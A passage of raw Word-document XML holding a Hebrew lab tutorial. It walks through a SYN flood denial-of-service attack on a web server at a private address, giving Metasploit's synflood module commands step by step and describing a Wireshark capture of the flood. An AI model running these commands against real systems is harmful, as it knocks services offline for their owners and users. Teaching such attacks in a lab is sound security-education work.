            <wp:wrapNone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1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A7F3E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9A048EF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51AE9BE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3485ED9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9BFCF23" w14:textId="1300A526" w:rsidR="006E68E4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3BDA440" w14:textId="77777777" w:rsidR="009F468F" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7A5391" w14:textId="21F2C8DD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">עכשיו </w:t>
      </w:r>
      <w:r w:rsidR="00E6416D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ננסה לגשת חזרה לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בכתובת 192.168.1.156 </w:t>
      </w:r>
      <w:r w:rsidR="00E6416D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נראה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>שלא נצליח</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E4EA6C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יש ניסיון התחברות אבל אין תשובה מצד השרת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01F7BE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38464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E0A52D2" wp14:editId="65045CC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187440" cy="1038161"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone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03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A0AF1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52D28E00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29E76A8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DDEC9AA" w14:textId="7018D6A3" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00CE457A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 וברגע שנעצור את ההתקפה נוכל לגשת שוב לרשת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="03EF2DD2" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="00CE457A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EB6DF3" w14:textId="4D531FB0" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4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7D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Syn</w:t>
      </w:r>
      <w:r w:rsidR="009F468F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>flood attack</w:t>
      </w:r>
      <w:r w:rsidR="0002686C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 80</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF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</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Dos –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E5F26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ההתקפה הבאה מנצלת פגיעות בהקמת קשר </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> על ידי שליחת בקשות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מרובות ובכך לגרום למניעת שירות בשרת. לצורך ההדגמה נעשה שימוש גם ב </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090F4EA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03648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56629174" wp14:editId="1E72F545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449060" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapNone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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">תחילה נחזור לשורת הפקודה עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410A83F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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1360A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0102C29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1EF6F0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ונבצע חיפוש חדש ל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dos/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3983090E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הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search dos/</w:t>
      </w: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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72FF3526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ונעתיק את שורה 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לשורת הפקודה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6F58E" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000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הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use auxiliary/dos/</w:t>
      </w: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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w: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synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77272113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3B3821A6" wp14:editId="736F9F04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6644640" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone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CC39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57589B6C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7D4F6C13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6AF2200B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65C42BAC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31CC520F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0674C47F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48A2F4B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2E92A2EA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4A80B8B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389B4DF7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390ADAFE" w14:textId="3E3FC45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נציג את ההגדרות שנצטרך לביצוע המתקפה במקרה הזה זה די פשוט רק כתובת </w:t>
      </w:r>
      <w:r w:rsidR="00E6416D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70800914" w14:textId="2F5C0430" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000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הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78198352" w14:textId="60FF93CA" w:rsidR="00E6416D" w:rsidRPr="007D51BF" w:rsidRDefault="00E6416D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אפשר לראות באפשרויות שניתן להגדיר את כמות ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">syn </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שישלח </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D59116" w14:textId="3FFB8FE7" w:rsidR="00E6416D" w:rsidRPr="007D51BF" w:rsidRDefault="00E6416D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lastRenderedPageBreak/>
        <w:t>אבל כרגע אין צורך להגביל.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9370D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C3441C2" wp14:editId="1BCB7922">
            <wp:extent cx="6644640" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="75" name="תמונה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F86A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ונגדיר את כתובת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3DCBD" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set RHOSTS 192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC81D85" w14:textId="5C7A6C4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05696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67F2D608" wp14:editId="017DC8DF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6732905" cy="1417320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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653" cy="142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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ונבצע את ההתקפה עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A214F82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5AF4000C" w14:textId="1F65E694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5DB2B3AF" w14:textId="3C9B80CB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2BA42CEC" w14:textId="1B8DE01E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545C263C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6E33B717" w14:textId="471115AD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  <w:rtl/>
        </w:rPr>
        <w:t>אז כמו שאפשר לראות ההתקפה מתחילה לרוץ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103F1C1" w14:textId="7B83B434" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C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62016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F0012A4" wp14:editId="01BE79B1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6637020" cy="3634740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="117" name="תמונה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8E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עכשיו נתפתח </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נקליט את התעבורה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם הלחצן האדום בצד שמאל למעלה</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונעצור.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393B218" w14:textId="01016035" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E43CFC9" w14:textId="5C2F291D" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151E87CC" w14:textId="4F4C50F6" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCABB85" w14:textId="2588A21A" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BF8F8C" w14:textId="20F2A802" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18240668" w14:textId="391687AB" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305F7454" w14:textId="58FE7FC0" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3677BC4C" w14:textId="2A7F7764" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7714119D" w14:textId="57F4AF84" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FE41FA" w14:textId="15360AA9" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5543AC04" w14:textId="202AFF41" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8F265F" w14:textId="0ABFE87A" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13079059" w14:textId="21598A51" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090A5928" w14:textId="77777777" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E870E2" w14:textId="2F311549" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00F1790D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ונוכל לראות שנשלחות רק בקשות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591340AD" w14:textId="77777777" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D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52304994" w14:textId="09BD757C" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00CE457A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הערה: כתובת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שונתה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49386E21" w14:textId="356CD09A" w:rsidR="00F1790D" w:rsidRPr="007D51BF" w:rsidRDefault="009E0F91" w:rsidP="00F1790D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lastRenderedPageBreak/>
        <w:t>קיימ</w:t>
      </w:r>
      <w:r w:rsidR="00AF2C5B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ים כלים נוספים איתם ניתן לבצע התקפות מסוג זה אחד הכלים נקרא </w:t>
      </w:r>
      <w:r w:rsidR="00AF2C5B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hping3</w:t>
      </w:r>
      <w:r w:rsidR="00AF2C5B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם הכלי הזה ניתן לבצע מספר התקפות</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
